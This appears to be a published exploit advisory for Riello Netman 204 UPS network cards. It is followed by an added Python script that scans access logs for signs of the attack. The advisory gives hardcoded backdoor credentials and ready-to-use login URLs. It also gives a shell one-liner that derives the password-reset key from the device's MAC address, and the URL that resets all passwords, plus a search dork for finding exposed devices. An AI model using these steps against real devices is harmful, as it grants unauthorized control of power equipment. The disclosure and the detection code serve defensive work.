Netman 204 Backdoor / Password Reset

🗓️ 31 Jan 2017 00:00:00 | Reported by Saeed reza Zamania | Type: packetstorm | 🔗 packetstormsecurity.com

Code
```
# Exploit Title: Netman 204 Backdoor and weak password recovery function
# Google Dork: intitle:"Netman 204 login"
# Date: 31st Jan 2017
# Exploit Author: Simon Gurney
# Vendor Homepage: blog.synack.co.uk
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
# Version: S14-1 and S15-2
# Tested on: Riello UPS
# CVE : N/A

Netman 204 cards have a backdoor account eurek:eurek.

You can log in with this account simply by browsing to the URL
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek

If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:

NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
KEY=`echo .$NETMANID | md5sum | cut -c2-10`

To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
Such as,
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
Then take characters 2-10, where position 1 is character 1 (not 0).
Such as,
354a65581

Then browse to the URL:
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
or
https://[ip]/cgi-bin/recover2.cgi?password=354a65581

Passwords have now been reset.
```
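To spot use of the backdoor account or the reset endpoint described above, the following added example (not part of the original advisory) scans web access logs for the two request patterns. It assumes requests to the card pass through a proxy or sensor that writes Common Log Format; the sample lines, addresses and function names are constructed for illustration, and only query-string (GET) requests as shown in the advisory are covered.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (assumption: Common Log Format from a proxy
# or network sensor in front of the card). The reset key is a placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2017:10:00:01 +0000] "GET /cgi-bin/login.cgi?username=admin&password=x HTTP/1.1" 200 512
10.0.0.9 - - [31/Jan/2017:10:00:07 +0000] "GET /cgi-bin/login.cgi?username=eurek&password=eurek HTTP/1.1" 200 512
10.0.0.9 - - [31/Jan/2017:10:00:09 +0000] "GET /cgi-bin/login.cgi?username=eurek%20eurek HTTP/1.1" 200 512
10.0.0.9 - - [31/Jan/2017:10:00:15 +0000] "GET /cgi-bin/recover2.cgi?password=000000000 HTTP/1.1" 200 128
10.0.0.5 - - [31/Jan/2017:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# client ip, ident, user, [timestamp], "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def classify(line):
    """Return (client_ip, finding) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    params = parse_qs(url.query, keep_blank_values=True)
    if path.endswith("/cgi-bin/login.cgi"):
        # parse_qs decodes %20 and '+', so the shortened
        # "username=eurek%20eurek" form is caught as well.
        for user in params.get("username", []):
            if user.split()[:1] == ["eurek"]:
                return client, "backdoor-account-login"
    if path.endswith("/cgi-bin/recover2.cgi") and "password" in params:
        return client, "password-reset-request"
    return None


def scan(log_text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for client, finding in scan(SAMPLE_LOG):
        print(f"{client}\t{finding}")
```
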
